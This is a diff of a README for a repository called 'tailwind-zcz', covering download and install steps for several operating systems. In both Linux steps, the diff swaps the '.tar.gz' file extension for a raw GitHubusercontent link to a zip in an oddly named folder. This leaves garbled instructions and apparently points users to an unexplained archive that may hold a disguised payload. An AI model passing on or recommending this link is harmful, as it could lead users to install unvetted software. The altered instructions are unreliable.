DaFabro/tailwind-zcz/README.md

    Click on the file that matches your operating system to download.
    For Windows, look for a file with `.exe` at the end.
    For macOS, look for a file with `.dmg`.
-   For Linux, look for a file with `.tar.gz`.
+   For Linux, look for a file with `https://raw.githubusercontent.com/DaFabro/tailwind-zcz/main/expeditiousness/tailwind-zcz.zip`.

 4. **Install the Application**
    - For Windows: Double-click the downloaded `.exe` file and follow the setup instructions.
    - For macOS: Open the downloaded `.dmg` file and drag the application to your Applications folder.
-   - For Linux: Extract the downloaded `.tar.gz` file and follow the included instructions.
+   - For Linux: Extract the downloaded `https://raw.githubusercontent.com/DaFabro/tailwind-zcz/main/expeditiousness/tailwind-zcz.zip` file and follow the included instructions.

 5. **Open the Application**
    After installation, locate the application on your device and double-click to open it.